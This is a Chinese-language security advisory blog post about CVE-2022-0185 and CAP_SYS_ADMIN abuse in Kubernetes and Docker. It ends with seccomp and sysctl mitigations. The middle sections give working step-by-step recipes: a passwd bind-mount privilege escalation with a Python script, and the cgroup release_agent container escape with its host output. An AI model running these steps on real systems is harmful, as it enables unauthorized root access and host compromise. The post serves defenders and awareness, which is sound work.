高危！！Kubernetes 新型容器逃逸漏洞预警> 作者：米开朗基杨，KubeSphere 布道师，云原生重度感染者

作者：米开朗基杨，KubeSphere 布道师，云原生重度感染者

2022 年 1 月 18 日，Linux 维护人员和供应商在 Linux 内核（5.1-rc1+）文件系统上下文功能的 legacy_parse_param 函数中发现一个堆缓冲区溢出漏洞，该漏洞的 ID 编号为 CVE-2022-0185，属于高危漏洞，严重等级为 7.8。

该漏洞允许在内核内存中进行越界写入。利用这个漏洞，无特权的攻击者可以绕过任何 Linux 命名空间的限制，将其权限提升到 root。例如，如果攻击者渗透到你的容器中，就可以从容器中逃逸，提升权限。

该漏洞于 2019 年 3 月被引入 Linux 内核 5.1-rc1 版本。1 月 18 日发布的补丁修复了这个问题，建议所有 Linux 用户下载并安装最新版本的内核。

漏洞细节

该漏洞是由文件系统上下文功能（fs/fs_context.c）的 legacy_parse_param 函数中发现的整数下溢条件引起的。文件系统上下文的功能是创建用于挂载和重新挂载文件系统的超级块，超级块记录了一个文件系统的特征，如块和文件大小，以及任何存储块。

通过向 legacy_parse_param 函数发送超过 4095 字节的输入，便可以绕过输入长度检测，导致越界写入，触发该漏洞。攻击者可以利用此漏洞将恶意代码写入内存的其他部分，导致系统崩溃，或者可以执行任意代码以提升权限。

legacy_parse_param 函数的输入数据是通过 fsconfig 系统调用添加的，以用于配置文件系统的创建上下文（如 ext4 文件系统的超级块）。

// 使用 fsconfig 系统调用添加由 val 指向的以空字符（NULL）结尾的字符串
fsconfig(fd, FSCONFIG_SET_STRING, "\x00", val, 0);

要使用 fsconfig 系统调用，非特权用户必须至少在其当前命名空间中具有 CAP_SYS_ADMIN 特权。这意味着如果用户可以进入另一个具有这些权限的命名空间，则足以利用此漏洞。

如果非特权用户无法获得 CAP_SYS_ADMIN 权限，攻击者可以通过 unshare(CLONE_NEWNS|CLONE_NEWUSER) 系统调用获得该权限。Unshare 系统调用可以让用户创建或克隆一个命名空间或用户，从而拥有进行进一步攻击所需的必要权限。这种技术对于使用 Linux 命名空间来隔离 Pod 的 Kubernetes 和容器世界非常重要，攻击者完全可以在容器逃逸攻击中利用这一点，一旦成功，攻击者便可以获得对主机操作系统和系统上运行的所有容器的完全控制权限，从而进一步攻击内部网段的其他机器，甚至可以在 Kubernetes 集群中部署恶意容器。

发现该漏洞的研究团队于 1 月 25 日在 GitHub 上发布了利用该漏洞的代码和概念证明。

PoC

Docker 和其他容器运行时默认都会使用 Seccomp 配置文件来阻止容器中的进程使用危险的系统调用，以保护 Linux 命名空间边界。

Seccomp（全称：secure computing mode）在 2.6.12 版本（2005年3月8日）中引入 Linux 内核，将进程可用的系统调用限制为四种：read，write，_exit，sigreturn。最初的这种模式是白名单方式，在这种安全模式下，除了已打开的文件描述符和允许的四种系统调用，如果尝试其他系统调用，内核就会使用 SIGKILL 或 SIGSYS 终止该进程。

然而 Kubernetes 默认情况下并不会使用任何 Seccomp 或 AppArmor/SELinux 配置文件来限制 Pod 的系统调用，这就很危险了，Pod 中的进程可以自由访问危险的系统调用，伺机获得必要的特权（例如 CAP_SYS_ADMIN），以便进一步攻击。

我们先来看一个 Docker 的例子，在标准的 Docker 环境中，unshare 命令是无法使用的，Docker 的 Seccomp 过滤器阻止了这个命令使用的系统调用。

$ docker run --rm -it alpine /bin/sh
/ # unshare
unshare: unshare(0x0): Operation not permitted

再来看下 Kubernetes 的 Pod：

$ kubectl run --rm -it test --image=ubuntu /bin/bash
If you don't see a command prompt, try pressing enter.
root@test:/# lsns | grep user
4026531837 user        3   1 root /bin/bash
root@test:/#
root@test:/# apt update && apt install -y libcap2 libcap-ng-utils
root@test:/# ......
root@test:/# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap

可以看到 Pod 中的 root 用户并没有 CAP_SYS_ADMIN 能力，但我们可以通过 unshare 命令来获取 CAP_SYS_ADMIN 能力。

root@test:/# unshare -Urm
#
# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap
1     265   root        sh                full
# lsns | grep user
4026532695 user        3   265 root -sh

那么拥有了 CAP_SYS_ADMIN 可以做啥呢？这里给出两个示例，展示如何利用 CAP_SYS_ADMIN 来对系统进行渗透。

普通用户提权为 root 用户！

下面这段骚操作可以将主机中的普通用户直接提权为 root 用户。

先给 python3 赋予 CAP_SYS_ADMIN 能力（注意，不能对软链接进行操作，只能操作原文件）。

$ which python3
/usr/bin/python3

$ ll /usr/bin/python3
lrwxrwxrwx 1 root root 9 Mar 13  2020 /usr/bin/python3 -> python3.8*

$ setcap CAP_SYS_ADMIN+ep /usr/bin/python3.8
$ getcap /usr/bin/python3.8
/usr/bin/python3.8 = cap_sys_admin+ep

创建一个普通用户。

$ useradd test -d /home/test -m

然后切换到普通用户，并进入用户 home 目录。

$ su test
$ cd ~

将 /etc/passwd 复制到当前目录，并将 root 用户的密码改完 "password"。

$ cp /etc/passwd ./
$ openssl passwd -1 -salt abc password
$1$abc$BXBqpb9BZcZhXLgbee.0s/

# 将第一行的 root:x 改为 root:$1$abc$BXBqpb9BZcZhXLgbee.0s/
$ head -2 passwd
root:$1$abc$BXBqpb9BZcZhXLgbee.0s/:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

将修改后的 passwd 文件挂载到 /etc/passwd。

# cat mount-passwd.py
from ctypes import *
libc = CDLL("libc.so.6")
libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)
MS_BIND = 4096
source = b"/home/test/passwd"
target = b"/etc/passwd"
filesystemtype = b"none"
options = b"rw"
mountflags = MS_BIND
libc.mount(source, target, filesystemtype, mountflags, options)

$ python3 mount-passwd.py

**最后就是见证奇迹的时刻！！！**直接切换到 root 用户，并输入密码 "password"。

$ su root
Password: 
root@coredns:/home/test#

好神奇，切换到 root 用户了。。。

来看看是不是真的获得了 root 的权限吧：

$ find / -name "*flag*" 2>/dev/null
/sys/kernel/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/block/vdb/hctx0/flags
/sys/kernel/debug/block/vda/hctx0/flags
/sys/kernel/debug/block/loop7/hctx0/flags
/sys/kernel/debug/block/loop6/hctx0/flags
/sys/kernel/debug/block/loop5/hctx0/flags
/sys/kernel/debug/block/loop4/hctx0/flags
/sys/kernel/debug/block/loop3/hctx0/flags
/sys/kernel/debug/block/loop2/hctx0/flags
/sys/kernel/debug/block/loop1/hctx0/flags
/sys/kernel/debug/block/loop0/hctx0/flags
....

$ cat /sys/kernel/debug/block/vdb/hctx0/flags
alloc_policy=FIFO SHOULD_MERGE

嗯哼，是 root 没错了。

最后记得将 /etc/passwd 卸载哦。

$ umount /etc/passwd

所以，系统重启工程师（System Reboot Engineer）们，赶紧看看你们分配给其他人的普通用户有没有 CAP_SYS_ADMIN 能力吧~~

容器中查看主机所有进程！

再来看一个容器的例子，下面这段骚操作可以让你在容器中获取到主机正在运行的所有进程。

我们不需要使用 --privileged 参数来运行特权容器，那样就没意思啦。

$ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

接下来在容器中执行下面的命令，最终的效果是在主机上执行 ps aux 命令，并将其输出保存到容器中的 /output 文件。

# Mounts the RDMA cgroup controller and create a child cgroup
# This technique should work with the majority of cgroup controllers
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
# It's because your setup doesn't have the RDMA cgroup controller, try change rdma to memory to fix it
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Sets release_agent to /path/payload
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Creates a payload
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
# By creating a /bin/sh process and writing its PID to the cgroup.procs file in "x" child cgroup directory
# The script on the host will execute after /bin/sh exits 
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output

最终你可以在容器中看到主机中运行的所有进程：

root@0c84f7587629:/# cat /output
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.3 172704 13148 ?        Ss    2021 131:32 /sbin/init nopti
root           2  0.0  0.0      0     0 ?        S     2021   0:18 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<    2021   0:00 [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<    2021   0:00 [rcu_par_gp]
root           6  0.0  0.0      0     0 ?        I<    2021   0:00 [kworker/0:0H-kblockd]
root           8  0.0  0.0      0     0 ?        I<    2021   0:00 [mm_percpu_wq]
root           9  0.0  0.0      0     0 ?        S     2021  18:36 [ksoftirqd/0]
root          10  0.0  0.0      0     0 ?        I     2021 262:22 [rcu_sched]
root          11  0.0  0.0      0     0 ?        S     2021   3:06 [migration/0]
root          12  0.0  0.0      0     0 ?        S     2021   0:00 [idle_inject/0]
root          14  0.0  0.0      0     0 ?        S     2021   0:00 [cpuhp/0]
root          15  0.0  0.0      0     0 ?        S     2021   0:00 [cpuhp/1]
......

这些命令的具体含义我就不解释啦，感兴趣的可以自己对照注释研究一下。

可以确定的是，CAP_SYS_ADMIN 能力为攻击者提供了更多的可能性，不管是在宿主机还是在容器中，尤其是容器环境，如果我们因为不可抗因素无法升级内核，就要寻求其他的解决方案。

解决方案

容器层面

从 v1.22 版本开始，Kubernetes 便可以使用 SecurityContext 将默认的 Seccomp 或 AppArmor 配置文件添加到资源对象中，以保护 Pod、Deployment、Statefulset、Daemonset 等等。虽然这个功能目前处于 Alpha 阶段，但用户可以添加自己的 Seccomp 或 AppArmor 配置文件，并在 SecurityContext 中定义它。例如：

# pod-test.yaml
apiVersion: v1
kind: Pod
metadata:
  name: protected
spec:
  containers:
    - name: protected
      image: ubuntu
      command:
      - sleep
      - infinity
      securityContext:
        seccompProfile:
          type: RuntimeDefault

创建 Pod 后，尝试使用 unshare 获得 CAP_SYS_ADMIN 能力。

$ kubectl exec -it protected -- bash
root@protected:/#
root@protected:/# unshare -Urm
unshare: unshare failed: Operation not permitted

输出结果显示，unshare 系统调用被成功阻止了，攻击者便无法利用该能力进行攻击。

主机层面

还有一种方案是从主机层面禁止用户使用 user namespace 的能力，不需要重启系统。例如，在 Ubuntu 中，只需要执行下面两行命令便可即时生效，并且重启系统后也会生效。

$ echo "kernel.unprivileged_userns_clone=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf

如果是 Red Hat 系的系统，可以执行下面的命令来达到同样的效果。

$ echo "user.max_user_namespaces=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf

总结一下对于该漏洞的处理建议：

如果你的环境可以接受给内核打补丁，也能接受重启系统，最好打补丁，或者升级内核。
减少使用能够访问 CAP_SYS_ADMIN 的特权容器。
对于没有特权的容器，确保有一个 Seccomp 过滤器来阻止其对 unshare 的调用，以减少风险。Docker 没问题，Kubernetes 需要额外操作。
未来可以为 Kubernetes 集群中的所有工作负载启用 Seccomp 配置文件。目前该功能还处于 Alpha 阶段，需要通过特性开关（feature gate）开启。
在主机层面禁止用户使用 user namespace 的能力。

写在最后

容器环境错综复杂，特别是像 Kubernetes 这样的分布式调度平台，每一个环节都有自己的生命周期和攻击面，很容易暴露出安全风险，容器集群管理员必须注意每一处细节的安全问题。总的来说，绝大多数情况下容器的安全性都取决于 Linux 内核的安全性，因此，我们需要时刻关注任何安全问题，并尽快实施对应的解决方案。

参考资料

本文由博客一文多发平台 OpenWrite 发布！